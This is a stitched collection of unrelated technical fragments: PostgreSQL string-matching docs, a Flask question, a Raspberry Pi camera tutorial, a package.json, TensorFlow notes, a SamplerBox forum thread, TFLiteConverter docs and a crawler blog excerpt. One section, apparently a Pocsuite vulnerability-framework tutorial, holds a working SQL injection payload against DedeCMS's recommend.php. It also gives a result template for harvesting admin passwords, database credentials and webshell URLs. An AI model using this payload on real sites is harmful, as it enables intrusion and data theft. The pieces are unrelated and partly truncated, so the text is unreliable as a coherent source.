soundex(text) returns text
difference(text, text) returns int
The soundex function converts a string into its Soundex code, such as A550.
The difference function converts two strings into their Soundex codes. Then, the difference function reports the number of code matching positions between the two strings. A Soundex code consists of four characters. Therefore, the number of code matching positions ranges from 0 to 4. The value 0 indicates a zero match, and the value 4 indicates an exact match.
Examples:
SELECT soundex('hello world!') ;
SELECT soundex('Anne'), soundex('Andrew'), difference('Anne', 'Andrew');
SELECT soundex('Anne'), soundex('Margaret'), difference('Anne', 'Margaret');
CREATE TABLE s (nm text);
INSERT INTO s VALUES ('john');
INSERT INTO s VALUES ('joan');
INSERT INTO s VALUES ('wobbly');
INSERT INTO s VALUES ('jack');
SELECT * FROM s WHERE soundex(nm) = soundex('john');
SELECT * FROM s WHERE difference(s.nm, 'john') > 2;
Levenshtein
The Levenshtein algorithm calculates the Levenshtein distance between two strings.
The Levenshtein algorithm provides the following functions:
levenshtein(text source, text target, int ins_cost, int del_cost, int sub_cost) returns int
levenshtein(text source, text target) returns int
levenshtein_less_equal(text source, text target, int ins_cost, int del_cost, int sub_cost, int max_d) returns int
levenshtein_less_equal(text source, text target, int max_d) returns int
The following table describes the parameters that you must configure in the preceding functions.
Parameter descriptions:
source: The first string to compare. The string cannot be empty and can contain up to 255 characters in length.
target: The second string to compare. The string cannot be empty and can contain up to 255 characters in length.
ins_cost: The overhead that is required to insert characters.
del_cost: The overhead that is required to delete characters.
sub_cost: The overhead that is required to replace characters.
max_d: The maximum Levenshtein distance that is allowed between the two specified strings.
NoteThe levenshtein_less_equal function is an accelerated version of the levenshtein function. It is used only to calculate a short Levenshtein distance:
If the actual distance is less than or equal to the value of the max_d parameter, the levenshtein_less_equal function returns the exact distance that is calculated.
If the actual distance is greater than the value of the max_d parameter, the levenshtein_less_equal function returns a random distance that is greater than the value of the max_d parameter.
If the value of the max_d parameter is negative, the levenshtein_less_equal and levenshtein functions return the same distance.
Examples:
SELECT levenshtein('GUMBO', 'GAMBOL');
SELECT levenshtein('GUMBO', 'GAMBOL', 2,1,1);
SELECT levenshtein_less_equal('extensive', 'exhaustive',2);
SELECT levenshtein_less_equal('extensive', 'exhaustive',4);
Metaphone
The Metaphone algorithm works in the same way as the Soundex algorithm. The Metaphone algorithm constructs a representative code for each specified string. If two strings have the same representative code, the Metaphone algorithm considers them to be similar.
The Metaphone algorithm provides the following functions:
metaphone(text source, int max_output_length) returns text
The following table describes the parameters that you must configure in the preceding functions.
Parameter descriptions:
source: A string that is not empty. The string can contain up to 255 characters in length.
max_output_length: The maximum length of the Metaphone code that can be returned. If the Metaphone code exceeds the maximum length, the Metaphone algorithm truncates the Metaphone code to the maximum length.
Example:
SELECT metaphone('GUMBO', 4);
Double Metaphone
The Double Metaphone algorithm obtains two similar-sounding codes for a specified string. These codes include a primary code and a secondary code. In most cases, the two codes are the same. They may be slightly different when you specify a non-English word. The difference varies based on the pronunciation.
The Double Metaphone algorithm provides the following functions:
dmetaphone(text source) returns text
dmetaphone_alt(text source) returns text
Examples:
select dmetaphone('gumbo');
select dmetaphone_alt('gumbo');
|
In short, here is the Python code:
#import
from flask import Flask, render_template
from flask import request
from werkzeug.exceptions import BadRequestKeyError

#init
app = Flask(__name__)

#create pages
@app.route('/')
def SayHello():
    return 'Why it is not working :('

@app.route('/class_founder', methods=['GET'])
def check():
    key = request.form['text']
    swap = True

#run app
app.run(debug=True)
And here is the HTML:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Having time</title>
<link rel="stylesheet" href="static/style.css">
</head>
<body>
<section>
<form method="GET" action="/class_founder">
<input name='text' type="text">
<input type="submit" class="button" value="Start">
</form>
<div class="box">
<div class="bar" name='teacher_box'></div>
<div class="bar" name='subject_box'></div>
<div class="bar" name='student_box'></div>
</div>
</section>
</body>
</html>
I save it, restart it in the console, and open it in the browser.
And I get a BadRequestKeyError, saying the browser sent a request that the server could not understand. I am sure I wrote everything correctly: the input name and the key in request.form are identical, I have already checked that.
PLEASE HELP ME!!
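(For reference, the error almost certainly comes from reading request.form inside a GET handler: with method="GET" the browser sends the field as a query-string parameter, so it ends up in request.args, not request.form, and the missing key raises BadRequestKeyError. A minimal sketch of the fix, keeping the rest of the app as it is:
@app.route('/class_founder', methods=['GET'])
def check():
    # GET form fields arrive as query parameters -> request.args;
    # request.form is only filled for POST/PUT request bodies.
    key = request.args.get('text', '')
    return 'You typed: ' + key
Alternatively, switch both the form and the route to POST and keep request.form.)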
|
[Raspberry Pi] How to display the camera module's video in Tkinter
Created: November 4, 2019
Updated: July 30, 2020
This article shows how to display video captured by the Raspberry Pi camera module in real time in a GUI built with Tkinter.
As you can see in the video below, I managed to do it with very little lag.
First, here is the full code.
import tkinter
import cv2
import PIL.Image, PIL.ImageTk

class App:
    def __init__(self, window, window_title):
        self.window = window
        self.window.title(window_title)

        self.vcap = cv2.VideoCapture(0)
        self.width = self.vcap.get(cv2.CAP_PROP_FRAME_WIDTH)
        self.height = self.vcap.get(cv2.CAP_PROP_FRAME_HEIGHT)

        # Canvas that will show the camera module's video
        self.canvas = tkinter.Canvas(window, width=self.width, height=self.height)
        self.canvas.pack()

        # Close button
        self.close_btn = tkinter.Button(window, text="Close")
        self.close_btn.pack()
        self.close_btn.configure(command=self.destructor)

        # Call update() every 15 milliseconds to refresh
        # the video shown on the canvas
        self.delay = 15
        self.update()

        self.window.mainloop()

    # Refresh the camera module's frame on the canvas
    # every 15 milliseconds
    def update(self):
        _, frame = self.vcap.read()
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        self.photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(frame))
        self.canvas.create_image(0, 0, image = self.photo, anchor = tkinter.NW)
        self.window.after(self.delay, self.update)

    # Handler for the Close button
    def destructor(self):
        self.window.destroy()
        self.vcap.release()

App(tkinter.Tk(), "Tkinter & Camera module")
The key point is to call the update function every 15 milliseconds to refresh the image on the canvas.
The after function lets you run a function again after a set amount of time.
However, this alone will not get any video onto the screen!
That is because the code above is written for a web camera.
With a web camera the code above works fine, but with the camera module it fails.
It took me quite a lot of searching to finally find the solution.
Fix for the camera module's video not being displayed
Run sudo modprobe bcm2835-v4l2. Executing this command makes the camera module's video show up.
Reference sites
Python OpenCV - show a video in a Tkinter window
PiCamera streaming on Tkinter label -Help
|
{
"name": "sin3d",
"description": "Synthesis Image Noise Detection on Distributed Data : A web app to collect data on noise detection by humans on images.",
"version": "0.3.3",
"private": true,
"keywords": [
"noise",
"detection",
"synthesis image",
"distributed",
"data",
"web",
"experiment"
],
"directories": {
"doc": "./DOCUMENTATION"
},
"homepage": "https://github.com/prise-3d/SIN3D",
"author": "Antoine Sauvage <contact@asauvage.fr> (https://asauvage.fr/)",
"contributors": [
"Jérôme Buisine <contact@jeromebuisine.fr> (https://jeromebuisine.fr/)",
"Samuel Delepoulle <delepoulle@lisic.univ-littoral.fr>"
],
"repository": {
"type": "git",
"url": "git+https://github.com/prise-3d/SIN3D.git"
},
"bugs": {
"url": "https://github.com/prise-3d/SIN3D/issues"
},
"license": "MIT",
"scripts": {
"server:start": "node -r esm index.js",
"server:start:no-delete-extracts": "node -r esm index.js --no-delete",
"server:lint": "eslint server/ --fix",
"app:dev": "vue-cli-service serve",
"app:build": "vue-cli-service build",
"app:lint": "vue-cli-service lint",
"doc": "apidoc -i server/routes -o doc",
"test": "node test/utils/_test_setup_start.js && ava --verbose && node test/utils/_test_setup_stop.js"
},
"dependencies": {
"@hapi/boom": "^7.4.2",
"body-parser": "^1.19.0",
"compression": "^1.7.4",
"cors": "^2.8.5",
"cron": "^1.7.1",
"esm": "^3.2.25",
"express": "^4.17.1",
"helmet": "^3.18.0",
"mongoose": "^5.6.4",
"morgan": "^1.9.1",
"serve-static": "^1.14.1",
"sharp": "^0.24.0",
"ua-parser-js": "^0.7.20",
"winston": "^3.2.1"
},
"devDependencies": {
"@vue/cli-plugin-babel": "^3.9.2",
"@vue/cli-plugin-eslint": "^3.9.2",
"@vue/cli-service": "^3.9.2",
"@vue/eslint-config-standard": "^4.0.0",
"apidoc": "^0.17.7",
"ava": "^2.2.0",
"babel-eslint": "^10.0.2",
"deepmerge": "^4.0.0",
"eslint": "^6.0.1",
"eslint-plugin-vue": "^5.2.3",
"fs-extra": "^8.1.0",
"material-design-icons-iconfont": "^5.0.1",
"stylus": "^0.54.5",
"stylus-loader": "^3.0.2",
"supertest": "^4.0.2",
"vue": "^2.6.10",
"vue-cli-plugin-vuetify": "^0.5.0",
"vue-router": "^3.0.7",
"vue-template-compiler": "^2.6.10",
"vuetify": "^1.5.16",
"vuetify-loader": "^1.2.2",
"vuex": "^3.1.1",
"vuex-persist": "^2.0.1",
"yargs": "^13.2.4"
},
"postcss": {
"plugins": {
"autoprefixer": {}
}
},
"engines": {
"node": ">= 10.0.0"
},
"browserslist": [
"> 1%",
"last 2 versions",
"not ie <= 8"
],
"apidoc": {
"url": "https://diran.univ-littoral.fr/api",
"sampleUrl": "https://diran.univ-littoral.fr/api",
"template": {
"forceLanguage": "en"
}
},
"ava": {
"require": [
"esm"
]
}
}
|
Feature engineering methods
feature_column
Introduction
To be a competent TFboy, it is not enough to be fluent with the low-level APIs.
You also need to be able to use high-level APIs such as Estimator.
The high-level APIs offer good encapsulation, automatic checkpoint saving, automatic model export, and automatic optimizer setup (e.g. Adagrad).
They also let you use feature_column directly for feature processing of the input data.
Categorical data
Ways of handling categorical data include:
one_hot
categorical_column_with_hash_bucket (hash bucketing)
crossed_column (crossed bucketing)
one_hot
# Imports assumed for TensorFlow 1.x (they were not part of the original snippet)
import tensorflow as tf
from tensorflow import feature_column
from tensorflow.python.feature_column.feature_column import _LazyBuilder

color_data = {'color': ["R", "B", 'G', 'A', 'A']}  # 5 sample rows
builder = _LazyBuilder(color_data)
color_column = feature_column.categorical_column_with_vocabulary_list(
    'color', ['R', 'G', 'B'], dtype=tf.string, default_value=-1
)
color_column_tensor = color_column._get_sparse_tensors(builder)
# Convert the sparse ids to a dense tensor, i.e. one-hot form (multi-hot in general)
color_column_identy = feature_column.indicator_column(color_column)
color_dense_tensor = feature_column.input_layer(color_data, [color_column_identy])
with tf.Session() as session:
    session.run(tf.global_variables_initializer())
    session.run(tf.tables_initializer())
    print(session.run([color_column_tensor.id_tensor]))
    print('use input_layer' + '_' * 40)
    print(session.run([color_dense_tensor]))
Output:
[SparseTensorValue(indices=array([[0, 0],
[1, 0],
[2, 0],
[3, 0],
[4, 0]]), values=array([ 0, 2, 1, -1, -1]), dense_shape=array([5, 1]))]
use input_layer________________________________________
[array([[1., 0., 0.],
[0., 0., 1.],
[0., 1., 0.],
[0., 0., 0.],
[0., 0., 0.]], dtype=float32)]
categorical_column_with_identity
Some data, such as IDs, look numeric but are really categorical.
color_data = {'color': [1, 2, 3, 5, 1]}
builder = _LazyBuilder(color_data)
color_column = feature_column.categorical_column_with_identity(
    key='color', num_buckets=4, default_value=0)
color_column_tensor = color_column._get_sparse_tensors(builder)
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    sess.run(tf.tables_initializer())
    print(sess.run(color_column_tensor.id_tensor))
Output. num_buckets is the number of categories, and default_value is the fallback used when an id falls outside that range.
SparseTensorValue(indices=array([[0, 0],
[1, 0],
[2, 0],
[3, 0],
[4, 0]]), values=array([1, 2, 3, 0, 1]), dense_shape=array([5, 1]))
categorical_column_with_hash_bucket
When there are very many categories but most of them are rarely (or never) used, hash bucketing is convenient.
dpt = tf.feature_column.categorical_column_with_hash_bucket(
'dpt', hash_bucket_size=400)
The mapping rule can be inspected with string_to_hash_bucket_fast:
sess.run(tf.string_to_hash_bucket_fast(dpt_values, 400))  # dpt_values is a placeholder for the raw string values; the hash is applied to strings, not to the feature column object
crossed_column
tf.feature_column.crossed_column(["dpt","arr"],hash_bucket_size = 100000)
The mapping can be inspected via input_layer:
def get_hash(num1, num2):
    arr_temp = {arr: tf.Variable(cross_arr[num1:num2], tf.string)}
    dpt_temp = {dpt: tf.Variable(cross_dpt[num1:num2], tf.string)}
    arr_x_dpt = dict(arr_temp, **dpt_temp)
    # crossed column
    crossed_sn_raw = tf.feature_column.crossed_column(
        [arr, dpt], hash_bucket_size=self.crossed_column_bucket_size[i])
    crossed_sn = tf.feature_column.indicator_column(crossed_sn_raw)
    layer_sn = tf.feature_column.input_layer(arr_x_dpt, crossed_sn)
    with tf.Session() as session:
        init = tf.global_variables_initializer()
        session.run(init)
        res = session.run(layer_sn).argmax(axis=1)
    return res
Continuous data
For continuous data you can:
Use it directly:
tf.feature_column.numeric_column("age")
Or bucketize by quantiles (CDF):
age = tf.feature_column.bucketized_column \
(age ,boundaries = [1.0,10.0,50.0,75.0])
In general, the bucket boundaries are obtained via:
thresholds = []
percentiles = np.linspace(100/slice_num, 100-100/slice_num, slice_num-1)
thresholds_raw = np.percentile(np.array(f_values), percentiles, interpolation='lower')
which yields the bucket boundaries.
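As a small self-contained sketch (assuming TensorFlow 1.x; the age values below are made up for illustration), a bucketized_column can be fed to input_layer to inspect the resulting one-hot bucket encoding:
import tensorflow as tf
age_data = {'age': [3.0, 25.0, 62.0, 80.0]}        # hypothetical values
age_num = tf.feature_column.numeric_column('age')
age_bucket = tf.feature_column.bucketized_column(
    age_num, boundaries=[1.0, 10.0, 50.0, 75.0])   # 5 buckets
dense = tf.feature_column.input_layer(age_data, [age_bucket])
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    print(sess.run(dense))   # each row is a one-hot vector over the 5 buckets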
References
Written by mmmwhy; last edited: May 2, 2019 at 01:33 pm
|
0x00 About Pocsuite
Pocsuite is a remote vulnerability verification framework built around vulnerabilities and POCs by Knownsec's security research team. It lets you skip most of the low-level details and focus only on the verification code: it wraps the things we use all the time, such as requests. Normally when using requests you have to handle cookies and headers yourself, but inside the framework you don't, because the framework takes care of all of that for you.
0x01 Quick introduction
Installation
Install it with pip install pocsuite.
Common options
-u specify a single target URL
-f specify a file containing target URLs
-r specify a folder containing POCs
--report export the results to an HTML file
--cookie send a cookie with requests
--referer set the Referer header
--user-agent set the User-Agent header
Modes
There are two modes for running a POC:
--verify vulnerability verification mode (only verifies; does not change anything on the server)
--attack exploitation mode
Example
pocsuite -u "http://www.xxxx.com" -r poc_path/poc_name.py --attack
Writing a POC
You can create a new folder named mypoc and put your own POCs in it (you can also create subfolders inside mypoc to group POCs by category).
Example for this case (testing a target for common services by loading a whole category of POC scripts):
pocsuite -u "http://www.xxxx.com" -r poc_path/server/ --verify
POC naming convention
vulnerabilityID_version_vulnerabilityType (no uppercase letters; every symbol is replaced with "_"), roughly like this:
_xxxx_struct2_2016_s2_016_code_execution.py
_xxxx_dedecms_20130715_sql_inj.py
POC writing workflow
Import the pocsuite API modules
Create a TestPOC class
Fill in the POC metadata
Write the _verify() method
Write the _attack() method
Register the class
0x02 A full example
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Import the required pocsuite modules
from pocsuite.net import req  # requests-compatible module; same usage as requests
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    """docstring for TestPOC"""
    vulID = ''              # vulnerability ID
    version = ''            # version, defaults to 1
    author = ''             # POC author
    vulDate = ''            # date the vulnerability was disclosed; use today if unknown
    createDate = ''         # date the POC was written
    updateDate = ''         # date the POC was last updated; defaults to createDate
    references = ['']       # where the vulnerability was published; leave empty for 0days
    name = ''               # POC name
    appPowerLink = ''       # vendor homepage
    appName = ''            # affected application name
    appVersion = ''         # affected versions
    vulType = ''            # vulnerability type, see the vulnerability type reference table
    desc = ''' '''          # short description of the vulnerability
    samples = []            # sample URLs the POC was tested against (optional)
    install_requires = []   # third-party dependencies; avoid them if possible

    def _verify(self, verify=True):  # vulnerability verification code
        result = {}
        target_url = self.url
        # The verification logic goes here
        path = "/plus/recommend.php"
        payload = "?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select md5(512341)),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
        html = req.get(target_url + path + payload, timeout=10).content
        if '5e8523b1645e6225001b9027cddc1c85' in html:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + path
            result['VerifyInfo']['Path'] = path
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def _attack(self):  # exploitation code
        # result = {}
        # # First check whether the vulnerability exists
        # if not self._verify(verify=False):
        #     return self.parse_attack(result)
        # target_url = self.url
        # # The exploitation logic goes here
        # return self.parse_attack(result)
        return self._verify()  # if there is no exploit code, just return the verification result

    def parse_attack(self, result):  # output helper: reports success or failure
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Nothing returned')
        return output


register(TestPOC)  # register the class
0x03 The contents of the result dictionary in a POC
# result is a dictionary that stores all of the vulnerability information:
result: {
    'DBInfo': {
        'Username': 'admin username',
        'Password': 'admin password',
        'Salt': 'password salt',
        'Uid': 'user ID',
        'Groupid': 'user group ID'
    },
    'ShellInfo': {
        'URL': 'webshell URL',
        'Content': 'webshell content'
    },
    'FileInfo': {
        'Filename': 'file name',
        'Content': 'file content'
    },
    'XSSInfo': {
        'URL': 'verification URL',
        'Payload': 'verification payload'
    },
    'AdminInfo': {
        'Uid': 'admin ID',
        'Username': 'admin username',
        'Password': 'admin password'
    },
    'Database': {
        'Hostname': 'database hostname',
        'Username': 'database username',
        'Password': 'database password',
        'DBname': 'database name'
    },
    'VerifyInfo': {
        'URL': 'verification URL',
        'Postdata': 'verification POST data',
        'Path': 'absolute path of the site'
    },
    'SiteAttr': {
        'Process': 'server process'
    }
}
|
AlexM posted Sep 27 '16, 12:39:
Hey guys,
Wondering if anyone can help me with this idea.
So sometimes in a live set I'll have a song that has a 2 or more voices, eg verses=synth, choruses=mellotron, etc. Currently I use buttons on my MIDI controller to switch between instruments in combinator devices in Reason (for those familiar with the program). As you know with SamplerBox it can take a few seconds when switching between presets, which is fine in between songs but definitely not during.
How would I go about using a new keyword variable (let's say %voice) to the definition.txt to achieve this? In python I would imagine somehow disabling and enabling sample sets depending on which voice button is toggled, but I'm having trouble figuring out where to start...
HansEhv posted Sep 27 '16, 14:06:
You can also use another approach as midi offers 128 notes, which is 10 octaves. If you give the samples alternative midi note numbers, it is possible to have 2 to 4 voices in 1 sample. By using the octave buttons on the keyboard you can map it quite fast on the right range=voice.
AlexM posted Sep 27 '16, 16:19:
Ah ok good idea. What if the voice's midinote values are shifted instead?
-When voice is enabled, range is the usual 1-128
-Then disable all other voices by pushing their midinote ranges way out of the way 1000-1128
I know that simply assigning all required samples notes across 1-128 is easier to achieve programmatically, but I'm also thinking about easing the headaches caused when making sample sets ;)
HansEhv posted Sep 27 '16, 23:51:
That's the royal way indeed, but it will take some programming :-)
It will also set SB's requirements to PI3 because of the memory usage.
AlexM posted Sep 28 '16, 08:35:
That's in the case that the combined size of the samples might be massive, yeah? In my case, sample sets (or a voice) are rarely larger than 100mb so I wouldn't be worrying about that anyway - but it's definitely something worth bearing in mind
AlexM posted Sep 28 '16, 17:59:
This ended up being as easy as I initially thought - although it still took me half a day to find this solution haha!
Added a new %voice variable to definition.txt. For example,
piano_note%midinote_voicenumber%voice.wav
organ_note%midinote_voicenumber%voice.wav
I've condensed the code to mostly just my additions/modifications. The main thing was adding voice to the samples dictionary (dictionary, right?), and modifying the current_voice variable with MIDI buttons
# ACTUALLY LOAD
...
defaultparams = {'midinote': '0', 'velocity': '127', 'notename': '', 'voice': '1'}
...
.replace(r"\%voice", r"(?P<voice>\d+)")\
...
voice = int(info.get('voice', defaultparams['voice']))
voices.append(voice)
samples[midinote, velocity, voice] = Sound(os.path.join(dirname, fname), midinote, velocity)
...
initial_keys = set(samples.keys())
voices = list(set(voices)) # Remove duplicates by converting to a set
for voice in xrange(len(voices)):
for midinote in xrange(128):
lastvelocity = None
for velocity in xrange(128):
if (midinote, velocity, voice) not in initial_keys:
...
Some MIDI buttons will change the current_voice variable which determines which samples are active
# MIDI CALLBACK
...
try:
playingnotes.setdefault(midinote, []).append(samples[midinote, SelectVelocity, current_voice].play(midinote, velocity))
except:
pass
...
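For completeness, here is a hedged sketch (my own illustration, not code from the thread) of how a couple of MIDI controller buttons could drive the global current_voice that the callback above reads; the controller numbers 20 and 21 are arbitrary assumptions:
# Hypothetical illustration, not from the original SamplerBox patch.
# Assume the MIDI callback routes control-change messages here; CC 20/21 select voice 1/2.
current_voice = 1
def on_control_change(cc_number, cc_value):
    global current_voice
    if cc_value > 0:              # button pressed
        if cc_number == 20:       # assumed mapping: CC 20 -> voice 1
            current_voice = 1
        elif cc_number == 21:     # assumed mapping: CC 21 -> voice 2
            current_voice = 2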
Sustain pedal also works as intended: samples will keep sustaining even after a voice change.
I also discovered that this opens the door to layering samples which for me could be super useful, but I can also think of a handful of potential issues off the top of my head
HansEhv posted Sep 28 '16, 18:41:
That's clever! Really neat solution, thanks for sharing.
HansEhv posted Oct 2 '16, 17:43:
Some minor things I had to do to get it working:
"for voice in xrange(len(voices)):" changed to "for voice in voices:"
all occurrences of samples[] will have to get the extra parameter (obvious of course, but pretty hard to debug if you forget one :-))
current voice is a global variable
|
Convert a TensorFlow model into output_format.
tf.lite.TFLiteConverter(
graph_def, input_tensors, output_tensors, input_arrays_with_shape=None,
output_arrays=None, experimental_debug_info_func=None
)
This is used to convert from a TensorFlow GraphDef, SavedModel or tf.keras model into either a TFLite FlatBuffer or a graph visualization.
Example usage:
# Converting a GraphDef from session.
converter = lite.TFLiteConverter.from_session(sess, in_tensors, out_tensors)
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
# Converting a GraphDef from file.
converter = lite.TFLiteConverter.from_frozen_graph(
graph_def_file, input_arrays, output_arrays)
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
# Converting a SavedModel.
converter = lite.TFLiteConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
# Converting a tf.keras model.
converter = lite.TFLiteConverter.from_keras_model_file(keras_model)
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
Args
graph_def Frozen TensorFlow GraphDef.
input_tensors List of input tensors. Type and shape are computed using foo.shape and foo.dtype.
output_tensors List of output tensors (only .name is used from this).
input_arrays_with_shape Tuple of strings representing input tensor names and list of integers representing input shapes (e.g., [("foo" : [1, 16, 16, 3])]). Use only when graph cannot be loaded into TensorFlow and when input_tensors and output_tensors are None. (default None)
output_arrays List of output tensors to freeze graph with. Use only when graph cannot be loaded into TensorFlow and when input_tensors and output_tensors are None. (default None)
experimental_debug_info_func An experimental function to retrieve the graph debug info for a set of nodes from the graph_def.
Raises
ValueError Invalid arguments.
Attributes
inference_type Target data type of real-number arrays in the output file. Must be {tf.float32, tf.uint8}. If optimizations are provided, this parameter is ignored. (default tf.float32)
inference_input_type Target data type of real-number input arrays. Allows for a different type for input arrays. If an integer type is provided and optimizations are not used, quantized_input_stats must be provided. If inference_type is tf.uint8, signaling conversion to a fully quantized model from a quantization-aware trained input model, then inference_input_type defaults to tf.uint8. In all other cases, inference_input_type defaults to tf.float32. Must be {tf.float32, tf.uint8, tf.int8}
inference_output_type Target data type of real-number output arrays. Allows for a different type for output arrays. If inference_type is tf.uint8, signaling conversion to a fully quantized model from a quantization-aware trained output model, then inference_output_type defaults to tf.uint8. In all other cases, inference_output_type must be tf.float32; an error will be thrown otherwise. Must be {tf.float32, tf.uint8, tf.int8}
output_format Output file format. Currently must be {TFLITE, GRAPHVIZ_DOT}. (default TFLITE)
quantized_input_stats Dict of strings representing input tensor names mapped to tuple of floats representing the mean and standard deviation of the training data (e.g., {"foo" : (0., 1.)}). Only needed if inference_input_type is QUANTIZED_UINT8. real_input_value = (quantized_input_value - mean_value) / std_dev_value. (default {})
default_ranges_stats Tuple of integers representing (min, max) range values for all arrays without a specified range. Intended for experimenting with quantization via "dummy quantization". (default None)
drop_control_dependency Boolean indicating whether to drop control dependencies silently. This is due to TFLite not supporting control dependencies. (default True)
reorder_across_fake_quant Boolean indicating whether to reorder FakeQuant nodes in unexpected locations. Used when the location of the FakeQuant nodes is preventing graph transformations necessary to convert the graph. Results in a graph that differs from the quantized training graph, potentially causing differing arithmetic behavior. (default False)
change_concat_input_ranges Boolean to change behavior of min/max ranges for inputs and outputs of the concat operator for quantized models. Changes the ranges of concat operator overlap when true. (default False)
allow_custom_ops Boolean indicating whether to allow custom operations. When false, any unknown operation is an error. When true, custom ops are created for any op that is unknown. The developer will need to provide these to the TensorFlow Lite runtime with a custom resolver. (default False)
post_training_quantize Deprecated. Please specify [Optimize.DEFAULT] for optimizations instead. Boolean indicating whether to quantize the weights of the converted float model. Model size will be reduced and there will be latency improvements (at the cost of accuracy). (default False)
dump_graphviz_dir Full filepath of folder to dump the graphs at various stages of processing GraphViz .dot files. Preferred over --output_format=GRAPHVIZ_DOT in order to keep the requirements of the output file. (default None)
dump_graphviz_video Boolean indicating whether to dump the graph after every graph transformation. (default False)
target_ops Deprecated. Please specify target_spec.supported_ops instead. Set of OpsSet options indicating which converter to use. (default set([OpsSet.TFLITE_BUILTINS]))
target_spec Experimental flag, subject to change. Specification of target device.
optimizations Experimental flag, subject to change. A list of optimizations to apply when converting the model. E.g. [Optimize.DEFAULT]
representative_dataset A representative dataset that can be used to generate input and output samples for the model. The converter can use the dataset to evaluate different optimizations.
experimental_enable_mlir_converter Experimental flag, subject to change. Enables the MLIR converter instead of the TOCO converter.
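As a hedged sketch of how the optimizations and representative_dataset attributes are typically used together for post-training quantization (the calibration_inputs array and the saved_model_dir path below are stand-ins of my own, not part of this reference):
import numpy as np
import tensorflow as tf
# calibration_inputs is assumed to be a small, representative sample of real model inputs
calibration_inputs = np.random.rand(100, 16, 16, 3).astype(np.float32)
def representative_data_gen():
    for sample in calibration_inputs:
        # the converter expects a list with one array per model input
        yield [sample[np.newaxis, ...]]
converter = tf.lite.TFLiteConverter.from_saved_model("saved_model_dir")  # hypothetical path
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_data_gen
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)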
Methods
convert
View source
convert()
Converts a TensorFlow GraphDef based on instance variables.
Returns
The converted data in serialized format. Either a TFLite Flatbuffer or a Graphviz graph depending on the value in output_format.
Raises
ValueError Input shape is not specified. None value for dimension in input_tensor.
from_frozen_graph
View source
@classmethod
from_frozen_graph(
graph_def_file, input_arrays, output_arrays, input_shapes=None
)
Creates a TFLiteConverter class from a file containing a frozen GraphDef.
Args
graph_def_file Full filepath of file containing frozen GraphDef.
input_arrays List of input tensors to freeze graph with.
output_arrays List of output tensors to freeze graph with.
input_shapes Dict of strings representing input tensor names to list of integers representing input shapes (e.g., {"foo" : [1, 16, 16, 3]}). Automatically determined when input shapes is None (e.g., {"foo" : None}). (default None)
Returns
TFLiteConverter class.
Raises
IOError File not found. Unable to parse input file.
ValueError The graph is not frozen. input_arrays or output_arrays contains an invalid tensor name. input_shapes is not correctly defined when required.
from_keras_model_file
View source
@classmethod
from_keras_model_file(
model_file, input_arrays=None, input_shapes=None, output_arrays=None,
custom_objects=None
)
Creates a TFLiteConverter class from a tf.keras model file.
Args
model_file Full filepath of HDF5 file containing the tf.keras model.
input_arrays List of input tensors to freeze graph with. Uses input arrays from SignatureDef when none are provided. (default None)
input_shapes Dict of strings representing input tensor names to list of integers representing input shapes (e.g., {"foo" : [1, 16, 16, 3]}). Automatically determined when input shapes is None (e.g., {"foo" : None}). (default None)
output_arrays List of output tensors to freeze graph with. Uses output arrays from SignatureDef when none are provided. (default None)
custom_objects Dict mapping names (strings) to custom classes or functions to be considered during model deserialization. (default None)
Returns
TFLiteConverter class.
from_saved_model
View source
@classmethod
from_saved_model(
saved_model_dir, input_arrays=None, input_shapes=None, output_arrays=None,
tag_set=None, signature_key=None
)
Creates a TFLiteConverter class from a SavedModel.
Args
saved_model_dir SavedModel directory to convert.
input_arrays List of input tensors to freeze graph with. Uses input arrays from SignatureDef when none are provided. (default None)
input_shapes Dict of strings representing input tensor names to list of integers representing input shapes (e.g., {"foo" : [1, 16, 16, 3]}). Automatically determined when input shapes is None (e.g., {"foo" : None}). (default None)
output_arrays List of output tensors to freeze graph with. Uses output arrays from SignatureDef when none are provided. (default None)
tag_set Set of tags identifying the MetaGraphDef within the SavedModel to analyze. All tags in the tag set must be present. (default set("serve"))
signature_key Key identifying SignatureDef containing inputs and outputs. (default DEFAULT_SERVING_SIGNATURE_DEF_KEY)
Returns
TFLiteConverter class.
from_session
View source
@classmethod
from_session(
sess, input_tensors, output_tensors
)
Creates a TFLiteConverter class from a TensorFlow Session.
Args
sess TensorFlow Session.
input_tensors List of input tensors. Type and shape are computed using foo.shape and foo.dtype.
output_tensors List of output tensors (only .name is used from this).
Returns
TFLiteConverter class.
get_input_arrays
View source
get_input_arrays()
Returns a list of the names of the input tensors.
|
Selected results #
Crawling results on a number of websites. Figure 1 shows the result on this blog, indicating that the scheme works for ordinary websites; Figures 2 and 3 show results on forums built with two open-source forum packages, indicating that open-source forum software is crawled correctly; Figure 4 shows the result on the well-known Tianya forum, indicating that even a forum developed in-house by a company is handled reasonably well.
Room for improvement #
Overall, this is a fairly efficient, unsupervised, general-purpose website crawling scheme that adapts to different sites (not only forums) and is suitable for large-scale enterprise deployment.
Of course, the scheme still has some room for improvement:
1. To guarantee efficiency and stability it sacrifices some generality; for example, whether a text block counts as content is judged simply by the proportion of Chinese characters, rather than by a more accurate language-model-based criterion.
